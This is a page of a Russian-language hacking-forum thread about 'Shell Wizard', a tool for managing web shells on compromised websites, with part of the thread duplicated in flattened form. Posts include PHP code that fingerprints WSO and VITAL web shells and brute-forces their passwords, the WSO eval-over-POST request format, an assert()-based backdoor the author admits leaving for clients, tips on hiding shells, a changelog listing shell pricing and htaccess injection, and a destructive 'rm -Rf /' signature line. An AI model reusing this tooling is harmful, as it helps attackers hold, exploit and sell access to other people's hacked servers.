[S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :) - Страница 2

Boddhisatva · 23.11.2010, 15:20

Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать.
Хоть какая-то безопасность от посторонних глаз.

Acez666 · 16.12.2010, 00:34

досю себя в netstat ничего нету и в логах апатча. не досит чтоли?

Acez666 · 16.12.2010, 01:07

а не поперло, надо 600 потоков ставить.

dasknix · 26.12.2010, 19:50

про защищенные (не обязательно пассами, можно создать свой способ):

увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен,
либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря
на то что идея создать shm для автоматизации и управления была давно.. ну вы сами
знаете - идей дофига а на практике по проекту в полгода дай бог рожаем

написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet()

PHP код:


			
// sh pattz

    $shpats = array(

         T_VITAL =>    array(

             def => array('<title>VITAL</title>')

            ,auth => array(

                 'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}'

                ,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">'

             )

            ,auth_answ => array(

                 '<meta http-equiv="refresh" content="1;URL='

                ,'<a style="font:12px Verdana" href="'

                ,'">Success</a>'

             )

         )

        ,T_WSO => array(

             def => array("BOFF 1.0")

            ,auth => array(

                 "<pre align=center><b>Authorization</b><br>"

                ,"0ff \/\/"

                ,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"

            )

         )

        #,T_CMAD => ""

        #,T_R57 => ""

    );

PHP код:


			
function shdet(array $sh){

    global $shpats;

    global $pwdz;

    global $shz;



    $buf = nw_get(M_GET, $sh[url]);



    foreach($shpats as $shpat_type => $shpat){

        if(inarr($shpat[def],$buf)){

            mod($sh,    AUTH_NO,        auth,need);

            mod($sh,    $shpat_type,    type);

            mod($sh,    ONLINE,            status);

            /*

                $shz[$sh[id]][auth][need]    = AUTH_NO;

                $shz[$sh[id]][type]            = $shpat_type;

                $shz[$sh[id]][status]        = ONLINE;

                $shz[$sh[id]][update]        = ONLINE;

            */

            return true;

        }

    }



    foreach($shpats as $shpat_type => $shpat){

        foreach($shpat[auth] as $auth_pat){

            if(strpos($buf, $auth_pat) !== false){

                global $cookie;



                $shz[$sh[id]][type] = $shpat_type;

                $sh[type] = $shpat_type;

                $shz[$sh[id]][auth][need] = AUTH_USE;



                // auth to sh with current shpat type

                    foreach($pwdz as $pw){

                        $auth_answ = make_auth($sh, $pw);

                        if($shpats[$shpat_type][auth_answ][0])

                            $auth = inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK : false;

                        else

                            $auth = inarr($shpats[$shpat_type][def], $auth_answ) ? OK : false;



                        if($auth){

                            $shz[$sh[id]][auth][state] = OK;

                            $shz[$sh[id]][auth][pw] = $pw;

                            $shz[$sh[id]][auth][cook] = $cookie ? $cookie : null;

                            return true;

                        }

                        global $auth_delay;

                        sleep($auth_delay);

                    }

                //



                if(!$auth) $shz[$sh[id]][auth][state] = FAIL;

                return true;

            }

        }

    }



    return false;

}

PHP код:


			
function make_auth(array $sh, $pw){

    global $shz;



    cook($sh);



    switch($shz[$sh[id]][type]){        // don' use local old $sh!

        case T_VITAL:

            $nwreq_method    = M_POST;

            $nwreq_fpath    = $sh[url];

            $nwreq_postargs    = array(

                                        'doing'        => 'login'

                                    ,    'password'    => $pw

                                    );

            # $cookie        = array('phpspypass'    => $pw);



            return nw_get($nwreq_method, $nwreq_fpath, $nwreq_postargs);

        break;

        case T_WSO:

            $nwreq_method    = M_POST;

            $nwreq_fpath    = $sh[url];

            $nwreq_postargs    = array('pass'    => $pw);

            

            return nw_get($nwreq_method, $nwreq_fpath, $nwreq_postargs);

        break;

        case T_CMAD:

        break;

        case T_R57:

        break;

        default:

            return false;

    }

}

само собой делаем регексы, паттерны что
выше по strpos() сделаны на скорую руку

spiderbuber · 25.03.2011, 06:33

Также при чеке ошибка:

Цитата:

(12:09:42) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 X:\home\shwizard\www\includes\func.shell.php (line 61)

Пробовал на разных шеллах. Как поправить регулярку?

Хотелось бы увидеть в новой версии возможность чека не только ПР, но и ТИЦ + Стату ЛИ.РУ а также добавить несколько полей для произвольных меток и комметариев.

Cuko · 09.12.2011, 07:32

не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.

curlbaby · 11.12.2011, 17:41

для WSO с паролем достаточно передать его по POST, как пример:

Цитата:

Сообщение от Nightmare

5) eval POST: a=Php&p1=[evalcode]

5) eval POST: pass=password&a=Php&p1=[evalcode]

(dm) · 24.12.2011, 17:04

Мне понравилась 33 строчка index.php:

Цитата:

if(!empty($_POST['pass']) && !assert($_POST['pass']))die();

M_script · 25.12.2011, 15:57

Цитата:

Сообщение от (dm)

Мне понравилась 33 строчка index.php

Так вот что означают слова "вместе c Dr.Z3r0" в названии темы.

Dr.Z3r0 · 28.12.2011, 18:11

Цитата:

Сообщение от (dm)

Мне понравилась 33 строчка index.php:

упс, дико извиняюсь) осталось от старых версий))
тулза разрабатывалась на заказ, с заказчиком работал впервые поэтому был оставлен бекдор на случай если заказчик кинет.
я уже забыл про него

еще раз извиняюсь, я не спецом, серьезно)

UPD:
И дабы загладить свою вину, выкладываю новую версию 5.0. Изменения:

Цитата:

С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!

PS: в ней бекдоров нету... вроде...))

26.12.2010, 19:50	#14
dasknix Регистрация: 30.07.2010 Сообщений: 20 Репутация: 0	про защищенные (не обязательно пассами, можно создать свой способ): увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен, либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря на то что идея создать shm для автоматизации и управления была давно.. ну вы сами знаете - идей дофига а на практике по проекту в полгода дай бог рожаем написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet() PHP код: // sh pattz $shpats = array( T_VITAL => array( def => array('<title>VITAL</title>') ,auth => array( 'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}' ,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">' ) ,auth_answ => array( '<meta http-equiv="refresh" content="1;URL=' ,'<a style="font:12px Verdana" href="' ,'">Success</a>' ) ) ,T_WSO => array( def => array("BOFF 1.0") ,auth => array( "<pre align=center><b>Authorization</b><br>" ,"0ff \/\/" ,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>" ) ) #,T_CMAD => "" #,T_R57 => "" ); PHP код: function shdet(array $sh){ global $shpats; global $pwdz; global $shz; $buf = nw_get(M_GET, $sh[url]); foreach($shpats as $shpat_type => $shpat){ if(inarr($shpat[def],$buf)){ mod($sh, AUTH_NO, auth,need); mod($sh, $shpat_type, type); mod($sh, ONLINE, status); /* $shz[$sh[id]][auth][need] = AUTH_NO; $shz[$sh[id]][type] = $shpat_type; $shz[$sh[id]][status] = ONLINE; $shz[$sh[id]][update] = ONLINE; */ return true; } } foreach($shpats as $shpat_type => $shpat){ foreach($shpat[auth] as $auth_pat){ if(strpos($buf, $auth_pat) !== false){ global $cookie; $shz[$sh[id]][type] = $shpat_type; $sh[type] = $shpat_type; $shz[$sh[id]][auth][need] = AUTH_USE; // auth to sh with current shpat type foreach($pwdz as $pw){ $auth_answ = make_auth($sh, $pw); if($shpats[$shpat_type][auth_answ][0]) $auth = inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK : false; else $auth = inarr($shpats[$shpat_type][def], $auth_answ) ? OK : false; if($auth){ $shz[$sh[id]][auth][state] = OK; $shz[$sh[id]][auth][pw] = $pw; $shz[$sh[id]][auth][cook] = $cookie ? $cookie : null; return true; } global $auth_delay; sleep($auth_delay); } // if(!$auth) $shz[$sh[id]][auth][state] = FAIL; return true; } } } return false; } PHP код: function make_auth(array $sh, $pw){ global $shz; cook($sh); switch($shz[$sh[id]][type]){ // don' use local old $sh! case T_VITAL: $nwreq_method = M_POST; $nwreq_fpath = $sh[url]; $nwreq_postargs = array( 'doing' => 'login' , 'password' => $pw ); # $cookie = array('phpspypass' => $pw); return nw_get($nwreq_method, $nwreq_fpath, $nwreq_postargs); break; case T_WSO: $nwreq_method = M_POST; $nwreq_fpath = $sh[url]; $nwreq_postargs = array('pass' => $pw); return nw_get($nwreq_method, $nwreq_fpath, $nwreq_postargs); break; case T_CMAD: break; case T_R57: break; default: return false; } } само собой делаем регексы, паттерны что выше по strpos() сделаны на скорую руку __________________ [r@/]# rm -Rf / --no-recover

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

23.11.2010, 15:20	#11
Boddhisatva Регистрация: 23.11.2010 Сообщений: 1 Репутация: 0	Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать. Хоть какая-то безопасность от посторонних глаз.

16.12.2010, 00:34	#12
Acez666 Регистрация: 13.12.2010 Сообщений: 10 Репутация: 1	досю себя в netstat ничего нету и в логах апатча. не досит чтоли?

16.12.2010, 01:07	#13
Acez666 Регистрация: 13.12.2010 Сообщений: 10 Репутация: 1	а не поперло, надо 600 потоков ставить.

09.12.2011, 07:32	#16
Cuko Регистрация: 12.11.2010 Сообщений: 15 Репутация: 2	не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.